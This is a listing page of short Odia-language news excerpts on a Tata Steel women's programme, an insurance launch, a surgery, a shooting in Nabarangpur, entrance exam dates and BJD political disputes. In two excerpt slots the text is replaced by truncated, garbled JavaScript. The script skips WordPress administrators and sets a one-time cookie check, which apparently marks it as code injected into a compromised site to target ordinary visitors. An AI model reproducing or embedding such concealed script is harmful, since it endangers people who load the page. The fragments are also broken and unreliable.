Browsing Category
News
ଟାଟା ଷ୍ଟିଲ୍ ଫାଉଣ୍ଡେସନର ‘ଦିଶା’ ସମାବର୍ତ୍ତନ ଉତ୍ସବ: ୫୧୦ ଗ୍ରାମୀଣ ମହିଳା ସାଜିଲେ ଦକ୍ଷ ନେତୃତ୍ୱ
ବ୍ରହ୍ମପୁର, ୯.୦୧.୨୦୨୬: ଗ୍ରାମାଞ୍ଚଳର ମହିଳାମାନଙ୍କୁ ସଶକ୍ତ କରିବା ଏବଂ ସେମାନଙ୍କ ମଧ୍ୟରେ ନେତୃତ୍ୱ ମନୋଭାବ ଜାଗ୍ରତ କରିବା ଲକ୍ଷ୍ୟରେ ଟାଟା ଷ୍ଟିଲ୍ ଫାଉଣ୍ଡେସନ (ଟିଏସଏଫ୍) ପକ୍ଷରୁ ବ୍ରହ୍ମପୁର ବିଶ୍ୱବିଦ୍ୟାଳୟ ପରିସରରେ ‘ଦିଶା’ କାର୍ଯ୍ୟକ୍ରମର ବାର୍ଷିକ ସମାବର୍ତ୍ତନ ଉତ୍ସବ ଅନୁଷ୍ଠିତ…
ଏସବିଆଇ ଲାଇଫ୍ ପକ୍ଷରୁ ‘ଏସବିଆଇ ଲାଇଫ୍ – ସ୍ମାର୍ଟ ପ୍ଲାଟିନା ଆଡଭାଣ୍ଟେଜ୍’ର ଶୁଭାରମ୍ଭ
(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var…
Full Paisa Vasool Deals This Republic Week
(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var…
ଆସନ୍ନ ଅଙ୍ଗଚ୍ଛେଦକୁ ପ୍ରତିହିତ କରି ଜଟିଳ ଅସ୍ତ୍ରୋପଚାର ମାଧ୍ୟମରେ ରୋଗୀର ଗୋଡ଼କୁ ରକ୍ଷା କରିବାରେ ସଫଳ ହେଲେ ସମ୍ମମ…
ଭୁବନେଶ୍ୱର, : ରୋଗୀର ଆସନ୍ନ ଅଙ୍ଗଚ୍ଛେଦକୁ ପ୍ରତିହିତ କରି ଓଡ଼ିଶାରେ ପ୍ରଥମ ଥର ପାଇଁ ଆଣ୍ଠୁର ନିମ୍ନ ଭାଗକୁ ଅତ୍ୟାଧୁନିକ ଏଣ୍ଡୋଭାସ୍କୁଲାର ଆଥେରେକ୍ଟୋମି ପଦ୍ଧତିରେ ସଦ୍ୟତମ ଜେଟ୍ସଟ୍ରିମ ଟେକ୍ନୋଲଜି ବ୍ୟବହାର କରି ସୁରକ୍ଷା କରିବାରେ ସଫଳ ହୋଇଛନ୍ତି ସମ୍ ଅଲ୍ଟିମେଟ ମେଡିକେୟାର…
ପ୍ରଧାନମନ୍ତ୍ରୀଙ୍କ ଫେସବୁକ୍ ପୋଷ୍ଟରେ ଓଡ଼ିଆ ଗାୟିକା,, ଜାଣନ୍ତୁ କିଏ ସେ କଣ୍ଠଶିଳ୍ପୀ
ଭୁବନେଶ୍ୱର,୨୨/୦୩:ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦିଙ୍କ ସୋସିଆଲ୍ ମିଡିଆ ପେଜ୍ରେ ଓଡ଼ିଆ କଣ୍ଠଶିଳ୍ପୀ ଦୀପ୍ତିରେଖା ପାଢ଼ୀଙ୍କ ଗୀତ । ଚୈତ୍ର ନବରାତ୍ରୀ ଅବସରରେ ପ୍ରଧାନମନ୍ତ୍ରୀ ନରେନ୍ଦ୍ର ମୋଦି ନିଜ ସୋସିଆଲ୍ ମିଡିଆ ପେଜ୍ରେ ଏକ ଭକ୍ତିମୟ ଓଡ଼ିଆ ଗୀତର ୟୁଟ୍ୟୁବ୍ ଲିଙ୍କ୍ ସେୟାର କରିଛନ୍ତି!-->…
ମଦ୍ୟପର ଗୁଳିମାଡ଼ରେ ଯୁବକ ଗୁରୁତର
ନବରଙ୍ଗପୁର,୨୨/୦୩:ମଦ୍ୟପର ଗୁଳିମାଡ଼ରେ ଯୁବକ ଗୁରୁତର।କୁସୁମବାହାଲ ଗାଁରେ ବଚସା ପରେ ମଦ୍ୟପର ଗୁଳିମାଡ଼।ଗୁରୁତର ଯୁବକ ନବରଙ୍ଗପୁର ହସ୍ପିଟାଲରେ ଭର୍ତ୍ତି।ଅଭିଯୋଗ ଅନୁସାରେ, ଏକମ୍ବାପଡା ଗାଁର ବିଷମ ଶବର ନାମକ ଯୁବକ ପ୍ରଚୁର ମଦ୍ୟପାନ କରି ଲୋକଙ୍କ ସହ ଝଗଡା କରିଥିଲା । ଗାଁର ପାଣ୍ଡୁ!-->…
ଜୁନ ୩ ତାରିଖରେ ଏମଏଡ୍ ଏବଂ ବିଏଚଏଡ୍ ପାଠ୍ୟକ୍ରମ ପାଇଁ ପ୍ରବେଶିକା ପରୀକ୍ଷା
ଭୁବନେଶ୍ୱର,୨୨/୦୩:୨୦୨୬-୨୭ ଶିକ୍ଷାବର୍ଷ ନିମନ୍ତେ ଦୁଇ ବର୍ଷିଆ ବିଏଡ୍, ଏମ୍ଏଡ୍, ବିଏଚଏଡ୍ ପାଠ୍ୟକ୍ରମରେ ନାମଲେଖା ପ୍ରକିୟା ଶୀଘ୍ର ଆରମ୍ଭ କରାଯିବା ପାଇଁ ଉଚ୍ଚଶିକ୍ଷା ବିଭାଗ ପକ୍ଷରୁ ନିଷ୍ପତ୍ତି ଗ୍ରହଣ କରାଯାଇଛି।ଛାତ୍ରଛାତ୍ରୀମାନଙ୍କ ଚୟନ ପ୍ରବେଶିକା ପରୀକ୍ଷା ମାଧ୍ୟମରେ କରାଯିବ।!-->…
୩ ବିଧାୟକ କଟକକୁ କଳଙ୍କିତ କଲେ:ସୁବାସ ସିଂ
କଟକ,୨୨/୦୩:ରାଜ୍ୟସଭା ନିର୍ବାଚନରେ କ୍ରସ୍ ଭୋଟିଂ ନେଇ ବର୍ଷିଲେ କଟକ ମେୟର।୩ ବିଧାୟକ କଟକକୁ କଳଙ୍କିତ କଲେ କହିଲେ ମେୟର ସୁବାସ ସିଂ।କଟକ ଜିଲ୍ଲାର ୩ ବିଧାୟକଙ୍କ ନାଁ ନେଇ ବର୍ଷିଲେ ସୁବାସ।ସୌଭିକ ବିଶ୍ବାଳ, ଦେବୀରଞ୍ଜନ ତ୍ରିପାଠୀ ଓ ସୋଫିଆ ଫିର୍ଦ୍ଦୋସ କଳଙ୍କିତ କଲେ।ଏମାନେ ଯେଭଳି!-->…
ବହିଷ୍କାର କରିଥିଲେ ଖୁସି ହୋଇଥାନ୍ତି:ସୌଭିକ୍
ଭୁବନେଶ୍ୱର,୨୨/୦୩:ବିଜେଡି ଦଳରୁ ନିଲମ୍ବନ ପରେ ପ୍ରତିକ୍ରିୟା ରଖିଛନ୍ତି ସୌଭିକ ବିଶ୍ୱାଳ ।ନବୀନ ପଟ୍ଟନାୟକଙ୍କୁ ସିଧା ନିଶାନା କଲେ ସୌଭିକ୍ ବିଶ୍ବାଳ।ବାପାଙ୍କ ପ୍ରତି ହୋଇଥିବା ଅପମାନକୁ ସହ୍ୟ କରିପାରିବି ନାହିଁ।ଯଦି ଏଥିପାଇଁ ମୋତେ ଗୁଳି ଖାଇବାକୁ ପଡ଼େ ତାହାଲେ ସାମ୍ନା କରିବି।କେବଳ!-->…